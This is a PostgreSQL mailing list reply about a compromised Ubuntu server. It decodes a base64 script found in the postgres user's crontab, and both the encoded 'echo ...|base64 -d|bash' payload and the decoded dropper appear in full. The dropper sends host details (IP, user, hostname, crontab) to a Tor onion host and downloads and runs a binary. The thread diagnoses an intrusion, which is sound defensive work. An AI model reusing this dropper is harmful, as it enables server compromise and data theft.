Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

From: Ebubekir Büyüktosun <ebubekir(dot)buyuktosun(at)primeit(dot)com(dot)tr>
To: Antonis Christodoulou <christan305(at)hotmail(dot)com>
Cc: Ahmet Demir <dbademir(at)gmail(dot)com>, Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us>, Rob Sargent <robjsargent(at)gmail(dot)com>, "pgsql-general(at)lists(dot)postgresql(dot)org" <pgsql-general(at)lists(dot)postgresql(dot)org>, Matthias Apitz <guru(at)unixarea(dot)de>
Subject: Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours
Date: 2023-01-02 08:54:53
Message-ID: 567411672649367@mail.yandex.com.tr
Views: Raw Message | Whole Thread | Download mbox | Resend email
Thread:
Lists: pgsql-general

<div>Hey Antonis,</div><div> </div><div>If you decode the below Base64 code, you will see the following bash script that is tried to execute on your machine;</div><div> </div><div><div><blockquote><div><strong>x8C8W8llVk0Rzccy9N0ggCOI2VBAc</strong></div><div><strong>exec &amp;&gt;/dev/null</strong></div><div><strong>export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin</strong></div><div> </div><div><strong>d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)</strong></div><div><strong>c=$(echo "curl -4fsSLkA- -m200")</strong></div><div><strong>t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad")</strong></div><div> </div><div><strong>sockz() {<!-- --></strong></div><div><strong>n=(dns.twnic.tw doh-ch.blahdns.com doh-de.blahdns.com doh-fi.blahdns.com doh-jp.blahdns.com doh.li doh.pub doh-sg.blahdns.com fi.doh.dns.snopyta.org dns.digitalsize.net)</strong></div><div><strong>p=$(echo "dns-query?name=relay.tor2socks.in")</strong></div><div><strong>q=${n[$((RANDOM%${#n[(at)]}))]}</strong></div><div><strong>s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)</strong></div><div><strong>}</strong></div><div> </div><div><strong>fexe() {<!-- --></strong></div><div><strong>for i in . $HOME /usr/bin $d /var/tmp ;do echo exit &gt; $i/i &amp;&amp; chmod +x $i/i &amp;&amp; cd $i &amp;&amp; ./i &amp;&amp; rm -f i &amp;&amp; break;done</strong></div><div><strong>}</strong></div><div> </div><div><strong>u() {<!-- --></strong></div><div><strong>sockz</strong></div><div><strong>f=/int.$(uname -m)</strong></div><div><strong>x=./$(date|md5sum|cut -f1 -d-)</strong></div><div><strong>r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)</strong></div><div><strong>$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r</strong></div><div><strong>chmod +x $x;$x;rm -f $x</strong></div><div><strong>}</strong></div><div> </div><div><strong>for h in tor2web.in tor2web.it</strong></div><div><strong>do</strong></div><div><strong>if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then</strong></div><div><strong>fexe;u $t.$h</strong></div><div><strong>ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)</strong></div><div><strong>ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)</strong></div><div><strong>else</strong></div><div><strong>break</strong></div><div><strong>fi</strong></div><div><strong>done</strong></div></blockquote></div></div><div> </div><div>02.01.2023, 11:37, "Antonis Christodoulou" &lt;christan305(at)hotmail(dot)com&gt;:</div><blockquote><div style="word-wrap:break-word">Hey Matthias, here it is:<div> </div><div><div style="font-family:'menlo';font-size:11px;line-height:normal;margin:0px"><span style="color:#2fb41d"><strong><a href="mailto:christan(at)vultr" rel="noopener noreferrer">christan(at)vultr</a></strong></span>:<span style="color:#400bd9"><strong>~</strong></span>$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh</div><div style="font-family:'menlo';font-size:11px;line-height:normal;margin:0px">#!/bin/bash</div><div style="font-family:'menlo';font-size:11px;line-height:normal;margin:0px">exec &amp;&gt;/dev/null</div><div style="font-family:'menlo';font-size:11px;line-height:normal;margin:0px">echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc</div><div style="font-family:'menlo';font-size:11px;line-height:normal;margin:0px">echo <span style="background-color:#ff0000">eDhDOFc4bGxWazBSemNjeTlOMGdnQ09JMlZCQWMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiNGl1Y2lneHZsZng0dmNxbjVzb3JkZXJzYWEzYTN6dGpjYW9zenB0eHhvNWIzcGJuNm5sd3NmYWQiKQoKc29ja3ooKSB7Cm49KGRucy50d25pYy50dyBkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1maS5ibGFoZG5zLmNvbSBkb2gtanAuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLXNnLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmRpZ2l0YWxzaXplLm5ldCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnE9JHtuWyQoKFJBTkRPTSUkeyNuW0BdfSkpXX0Kcz0kKCRjIGh0dHBzOi8vJHEvJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8dGFpbCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK</span>|base64 -d|bash</div><div> <blockquote><div>On 2 Jan 2023, at 9:46 AM, Matthias Apitz &lt;<a href="mailto:guru(at)unixarea(dot)de" rel="noopener noreferrer">guru(at)unixarea(dot)de</a>&gt; wrote:</div> <div><div>El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou escribió:<br /> <blockquote>And for the record, Ahmet, here’s a weird cron job:<br /><br /><a href="mailto:christan(at)vultr" rel="noopener noreferrer">christan(at)vultr</a>:~$ sudo crontab -l -u postgres<br />13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh &gt; /dev/null 2&gt;&amp;1 &amp;<br /><br />Had no idea somebody can add something like this externally...</blockquote><br />Please post the content of this script.<br /><br />matthias<br /><br /><br />--<br />Matthias Apitz, ✉ <a href="mailto:guru(at)unixarea(dot)de" rel="noopener noreferrer">guru(at)unixarea(dot)de</a>, <a href="http://www.unixarea.de/" rel="noopener noreferrer">http://www.unixarea.de/</a> +49-176-38902045<br />Public GnuPG key: <a href="http://www.unixarea.de/key.pub" rel="noopener noreferrer">http://www.unixarea.de/key.pub</a></div></div></blockquote></div></div></div></blockquote><div> </div><div> </div><div> </div><div><span style="color:#000000;font-size:14px;line-height:normal"><strong><span style="font-family:'courier new' , monospace"><span style="background-color:#ffffff">İyi çalışmalar </span></span></strong></span></div><div><span style="color:#000000;font-size:14px;line-height:normal"><strong><span style="font-family:'courier new' , monospace"><span style="background-color:#ffffff">Best Regards</span></span></strong></span></div><div> </div><div><img src="https://avatars.mds.yandex.net/get-mail-signature/200369/b5cfbc69fec7ba407ad439c916819b51/orig" /></div><div> </div>

Attachment Content-Type Size
unknown_filename text/html 7.1 KB

In response to

Responses

Browse pgsql-general by date

  From Date Subject
Next Message Matthias Apitz 2023-01-02 09:35:55 Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours
Previous Message Antonis Christodoulou 2023-01-02 08:37:01 Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours